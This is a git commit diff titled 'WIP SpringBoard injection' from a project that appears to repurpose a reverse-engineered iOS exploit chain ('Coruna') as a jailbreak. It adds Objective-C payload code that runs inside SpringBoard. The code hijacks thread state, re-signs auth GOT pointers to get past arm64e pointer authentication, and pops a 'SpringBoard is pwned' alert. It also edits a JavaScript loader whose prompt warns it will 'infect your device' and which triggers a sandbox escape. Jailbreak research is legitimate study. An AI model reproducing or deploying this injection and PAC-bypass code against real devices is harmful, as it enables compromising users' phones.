WIP SpringBoard injection

This commit is contained in:
khanhduytran0
2026-03-11 11:00:37 +07:00
parent 84ca8390c6
commit cd5dd9a753
21 changed files with 227 additions and 29 deletions
+9
View File
@@ -1 +1,10 @@
.DS_Store
*.o
.theos
# IDA files
*.i64
*.id0
*.id1
*.nam
*.til
+2 -2
View File
@@ -173,9 +173,9 @@ coruna-main/
├── 7a7d...payload # Decrypted manifest (F00DBEEF with 19 download entries)
├── <hash>.bin # F00DBEEF container
└── <hash>/ # Extracted entries per container
├── entry0_type0x08.dylib # Kernel exploit runner -> powerd injector
├── entry0_type0x08.dylib # powerd implant?
├── entry1_type0x09.dylib # Kernel exploit <- what jailbreak developers are most interested in
├── entry2_type0x0f.dylib # powerd implant
├── entry2_type0x0f.dylib # Persistence?
├── entry3_type0x07.bin
└── ...
```
+2 -2
View File
@@ -1,4 +1,4 @@
TARGET := iphone:clang:latest:14.0
TARGET := iphone:clang:latest:15.0
ARCHS = arm64 arm64e
FINALPACKAGE = 1
STRIP = 0
@@ -9,7 +9,7 @@ include $(THEOS)/makefiles/common.mk
LIBRARY_NAME = SpringBoardTweak
SpringBoardTweak_FILES = SpringBoardTweak.m
SpringBoardTweak_CFLAGS = -fobjc-arc
SpringBoardTweak_CFLAGS = -fno-objc-arc
SpringBoardTweak_INSTALL_PATH = /usr/local/lib
include $(THEOS_MAKE_PATH)/library.mk
+210 -23
View File
@@ -1,30 +1,217 @@
@import Darwin;
@import MachO;
@import UIKit;
int start(void) {
#define FIX_SELECTOR(sel) *(&@selector(sel)) = (SEL)sel_registerName(#sel)
void payload_entry(void *arg) {
dispatch_async(dispatch_get_main_queue(), ^{
// see if JIT works
// void* jit = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0);
// if(jit == MAP_FAILED) {
// abort();
// }
// *((uint32_t*)jit) = 0xd2800000; // mov w0, #0
// *((uint32_t*)jit + 1) = 0xd65f03c0; // ret
// mprotect(jit, 0x1000, PROT_READ | PROT_EXEC);
// ((int(*)())jit)();
// fix selectors
FIX_SELECTOR(alertControllerWithTitle:message:preferredStyle:);
FIX_SELECTOR(addAction:);
FIX_SELECTOR(actionWithTitle:style:handler:);
FIX_SELECTOR(presentViewController:animated:completion:);
FIX_SELECTOR(sharedApplication);
FIX_SELECTOR(keyWindow);
FIX_SELECTOR(rootViewController);
UIAlertController *alert = [UIAlertController alertControllerWithTitle:@"Coruna" message:@"SpringBoard is pwned." preferredStyle:UIAlertControllerStyleAlert];
[alert addAction:[UIAlertAction actionWithTitle:@"Install TrollStore Helper (ETA SON?)" style:UIAlertActionStyleDefault handler:nil]];
[alert addAction:[UIAlertAction actionWithTitle:@"Respring" style:UIAlertActionStyleDefault handler:^(id action){
exit(0);
}]];
[alert addAction:[UIAlertAction actionWithTitle:@"Cancel" style:UIAlertActionStyleDefault handler:nil]];
[[UIApplication sharedApplication].keyWindow.rootViewController presentViewController:alert animated:YES completion:nil];
});
// infinite loop
CFRunLoopRun();
}
// opainject: set TLS to main thread
void _pthread_set_self(pthread_t p);
pthread_t pthread_main_thread_np(void);
__attribute__((noinline))
void *pacia(void* ptr, uint64_t ctx) {
#if __arm64e__
__asm__("xpaci %[value]\n" : [value] "+r"(ptr));
__asm__("pacia %0, %1" : "+r"(ptr) : "r"(ctx));
#endif
return ptr;
}
#if __arm64e__
#include <mach-o/loader.h>
#include <mach-o/dyld.h>
#include <mach-o/dyld_images.h>
#include <ptrauth.h>
#include <mach/mach.h>
#include <mach-o/ldsyms.h>
// Fixup chain pointer format for ARM64E authenticated pointers
typedef struct {
uint64_t target : 32; // runtimeOffset from image base
uint64_t high8 : 8;
uint64_t diversity: 16; // per-location discriminator
uint64_t addrDiv : 1; // address diversity flag
uint64_t key : 2; // ptrauth key (IA=0 IB=1 DA=2 DB=3)
uint64_t next : 4;
uint64_t bind : 1; // 0=rebase 1=bind
uint64_t auth : 1; // must be 1
} dyld_chained_ptr_arm64e_auth_rebase;
void resign_auth_got(const struct mach_header_64 *targetHeader) {
size_t (*pac_strlcpy)(char *dst, const char *src, size_t size) = pacia(strlcpy, 0);
int (*pac_strncmp)(const char *s1, const char *s2, size_t n) = pacia(strncmp, 0);
int (*pac_strcmp)(const char *s1, const char *s2) = pacia(strcmp, 0);
uint8_t *(*pac_getsectiondata)(const struct mach_header_64 *mh, const char *segname, const char *sectname, unsigned long *size) = pacia(getsectiondata, 0);
kern_return_t (*pac_vm_protect)(vm_map_t target_task, vm_address_t address, vm_size_t size, boolean_t set_maximum, vm_prot_t new_protection) = pacia(vm_protect, 0);
int (*pac_fsync)(int fd) = pacia(fsync, 0);
int (*pac_close)(int fd) = pacia(close, 0);
int (*pac_sleep)(unsigned int seconds) = pacia(sleep, 0);
int (*pac_open)(const char *path, int oflag, ...) = pacia(open, 0);
void (*pac_dprintf)(int fd, const char *format, ...) = pacia(dprintf, 0);
int fd = pac_open("/tmp/resign.log", O_WRONLY | O_CREAT | O_TRUNC, 0644);
assert(targetHeader->magic == MH_MAGIC_64);
uintptr_t base = (uintptr_t)targetHeader;
// Walk load commands to find __AUTH_GOT or __DATA_CONST.__auth_got
struct load_command *lcp = (void *)((uintptr_t)targetHeader + sizeof(struct mach_header_64));
for(int i = 0; i < targetHeader->ncmds; i++, lcp = (void *)((uintptr_t)lcp + lcp->cmdsize)) {
if (lcp->cmd != LC_SEGMENT_64) continue;
struct segment_command_64 *segCmd = (struct segment_command_64 *)lcp;
if (pac_strncmp(segCmd->segname, "__AUTH_CONST", sizeof(segCmd->segname)) &&
pac_strncmp(segCmd->segname, "__DATA_CONST", sizeof(segCmd->segname)) &&
pac_strncmp(segCmd->segname, "__DATA", sizeof(segCmd->segname))) continue;
struct section_64 *sections = (void *)((uintptr_t)lcp + sizeof(struct segment_command_64));
for (int j = 0; j < segCmd->nsects; j++) {
struct section_64 *section = &sections[i];
if ((section->flags & SECTION_TYPE) != S_LAZY_SYMBOL_POINTERS &&
(section->flags & SECTION_TYPE) != S_NON_LAZY_SYMBOL_POINTERS) continue;
pac_dprintf(fd, "Found section: %s\n", section->sectname);
char segname[sizeof(section->segname)+1];
pac_strlcpy(segname, section->segname, sizeof(segname));
char sectname[sizeof(section->sectname)+1];
pac_strlcpy(sectname, section->sectname, sizeof(sectname));
pac_dprintf(fd, "Processing section: %s.%s\n", segname, sectname);
if (pac_strcmp(sectname, "__auth_got")) continue;
unsigned long sectionSize = 0;
uint8_t *sectionStart = pac_getsectiondata(targetHeader, segname, sectname, &sectionSize);
pac_vm_protect(mach_task_self(), (vm_address_t)sectionStart, sectionSize, false, VM_PROT_READ | VM_PROT_WRITE);
void **symbolPointers = (void **)sectionStart;
for (uint32_t i = 0; i < (sectionSize / sizeof(void *)); i++) {
void *symbolPointer = symbolPointers[i];
if (!symbolPointer) continue;
pac_dprintf(fd, "Original pointer at index %u: %p\n", i, symbolPointer);
symbolPointers[i] = ptrauth_sign_unauthenticated(symbolPointers[i], ptrauth_key_process_independent_code, 0);
}
}
}
pac_dprintf(fd, "Done processing\n");
pac_fsync(fd);
pac_close(fd);
//
// struct load_command *lc = (void*)(base + sizeof(struct mach_header_64));
// for (uint32_t i = 0; i < mh->ncmds; i++, lc = (void*)((uint8_t*)lc + lc->cmdsize)) {
// if (lc->cmd != LC_SEGMENT_64) continue;
// struct segment_command_64 *seg = (void*)lc;
//
// if (strncmp(segCmd->segname, "__AUTH_CONST", sizeof(segCmd->segname)) &&
// strncmp(segCmd->segname, "__DATA_CONST", sizeof(segCmd->segname)) && strncmp(segCmd->segname, "__DATA", sizeof(segCmd->segname)) continue;
//
// struct section_64 *sect = (void*)(seg + 1);
// for (uint32_t j = 0; j < seg->nsects; j++, sect++) {
//
// uint64_t *slot = (uint64_t*)(base + sect->addr); // vm addr relative to base
// // use sect->offset if file-offset needed, but post-load use vmaddr
// slot = (uint64_t*)(sect->addr + (uintptr_t)base - (uintptr_t)mh->reserved /* ASLR slide handled below */);
//
// size_t count = sect->size / sizeof(uint64_t);
// for (size_t k = 0; k < count; k++) {
// uint64_t raw = slot[k];
//
// // Check if this is still an unresolved auth chain entry
// // auth bit = bit 63, bind bit = bit 62
// if (!(raw >> 63 & 1)) continue; // not an auth ptr, skip
//
// dyld_chained_ptr_arm64e_auth_rebase *chain =
// (dyld_chained_ptr_arm64e_auth_rebase*)&raw;
//
// if (chain->auth != 1) continue;
//
// // Resolve target address
// uintptr_t target = base + chain->target;
//
// // Build discriminator
// uint64_t disc = chain->diversity;
// if (chain->addrDiv) {
// disc = ptrauth_blend_discriminator(&slot[k], disc);
// }
//
// // Sign with correct key
// void *signed_ptr;
// switch (chain->key) {
// case 0: signed_ptr = ptrauth_sign_unauthenticated((void*)target, ptrauth_key_asia, disc); break;
// case 1: signed_ptr = ptrauth_sign_unauthenticated((void*)target, ptrauth_key_asib, disc); break;
// case 2: signed_ptr = ptrauth_sign_unauthenticated((void*)target, ptrauth_key_asda, disc); break;
// case 3: signed_ptr = ptrauth_sign_unauthenticated((void*)target, ptrauth_key_asdb, disc); break;
// }
//
// signed_ptr = (void *)0x4141414141414141; // for testing, overwrite with invalid pointer to verify fixup works
//
// // Write back — need __DATA_CONST to be writable first
// vm_protect(mach_task_self(), (vm_address_t)&slot[k],
// sizeof(uint64_t), false, VM_PROT_READ | VM_PROT_WRITE);
// slot[k] = (uint64_t)signed_ptr;
// vm_protect(mach_task_self(), (vm_address_t)&slot[k],
// sizeof(uint64_t), false, VM_PROT_READ);
// }
// }
// }
}
#endif
extern const struct mach_header_64 _mh_dylib_header;
int last(void) {
#if __arm64e__
pthread_t (*pac_pthread_main_thread_np)(void) = pacia(pthread_main_thread_np, 0);
void (*pac__pthread_set_self)(pthread_t) = pacia(_pthread_set_self, 0);
pac__pthread_set_self(pac_pthread_main_thread_np());
resign_auth_got(&_mh_dylib_header);
#else
_pthread_set_self(pthread_main_thread_np());
#endif
// create another thread to run the real payload
pthread_t self;
pthread_create(&self, NULL, (void *)payload_entry, NULL);
pthread_join(self, NULL);
// should not return
thread_terminate(mach_thread_self());
return 0;
}
int startl(void) {
dispatch_async(dispatch_get_main_queue(), ^{
UIAlertController* alert = [UIAlertController alertControllerWithTitle:@"Hello, world!" message:nil preferredStyle:UIAlertControllerStyleAlert];
[alert addAction:[UIAlertAction actionWithTitle:@"OK" style:UIAlertActionStyleDefault handler:nil]];
[[UIApplication sharedApplication].keyWindow.rootViewController presentViewController:alert animated:YES completion:nil];
});
return 0;
}
int startm(void) {
dispatch_async(dispatch_get_main_queue(), ^{
UIAlertController* alert = [UIAlertController alertControllerWithTitle:@"Hello, world!" message:nil preferredStyle:UIAlertControllerStyleAlert];
[alert addAction:[UIAlertAction actionWithTitle:@"OK" style:UIAlertActionStyleDefault handler:nil]];
[[UIApplication sharedApplication].keyWindow.rootViewController presentViewController:alert animated:YES completion:nil];
});
return 0;
}
int startr(void) {
dispatch_async(dispatch_get_main_queue(), ^{
UIAlertController* alert = [UIAlertController alertControllerWithTitle:@"Hello, world!" message:nil preferredStyle:UIAlertControllerStyleAlert];
[alert addAction:[UIAlertAction actionWithTitle:@"OK" style:UIAlertActionStyleDefault handler:nil]];
[[UIApplication sharedApplication].keyWindow.rootViewController presentViewController:alert animated:YES completion:nil];
});
int end(void) {
// should not return
thread_terminate(mach_thread_self());
return 0;
}
+2 -2
View File
@@ -1248,7 +1248,7 @@ function YA() {/* Original: YA → resolveSymbols */
// When we load the metadata, ask user if they want to continue (will infect device)
if (hashName === "7a7d99099b035b2c6512b6ebeeea6df1ede70fbb") {
let shouldContinue = confirm(
"The script is about to load metadata and subsequent payloads to infect your device in `powerd` process.\n" +
"The script is about to load metadata and subsequent payloads to infect your device in `SpringBoard` process.\n" +
"Cancel = safely STOP this operation\n" +
"OK = continue infect your device");
if (!shouldContinue) {
@@ -1722,4 +1722,4 @@ r.lA = () => {// Entry point: resolves APIs, builds payload, executes sandbox es
const A = globalThis.moduleManager.getModuleByName("b5135768e043d1b362977b8ba9bff678b9946bcb");
return A._d(), A.qd(), executeSandboxEscape();
};
return r;
return r;
@@ -0,0 +1 @@
../entry2_type0x0f_arm64e.dylib
@@ -0,0 +1 @@
../entry2_type0x0f_arm64e.dylib
@@ -0,0 +1 @@
../entry2_type0x0f_arm64.dylib
@@ -0,0 +1 @@
../entry2_type0x0f_arm64e.dylib
@@ -0,0 +1 @@
../entry2_type0x0f_arm64.dylib
@@ -0,0 +1 @@
../entry2_type0x0f_arm64.dylib
@@ -0,0 +1 @@
../entry2_type0x0f_arm64.dylib
@@ -0,0 +1 @@
../entry2_type0x0f_arm64.dylib
@@ -0,0 +1 @@
../entry2_type0x0f_arm64e.dylib
@@ -0,0 +1 @@
../entry2_type0x0f_arm64e.dylib
@@ -0,0 +1 @@
../entry2_type0x0f_arm64e.dylib
@@ -0,0 +1 @@
../entry2_type0x0f_arm64e.dylib
@@ -0,0 +1 @@
../entry2_type0x0f_arm64.dylib
+1
View File
@@ -0,0 +1 @@
../SpringBoardTweak/.theos/obj/arm64/SpringBoardTweak.dylib
+1
View File
@@ -0,0 +1 @@
../SpringBoardTweak/.theos/obj/arm64e/SpringBoardTweak.dylib
@@ -0,0 +1 @@
../entry2_type0x0f_arm64e.dylib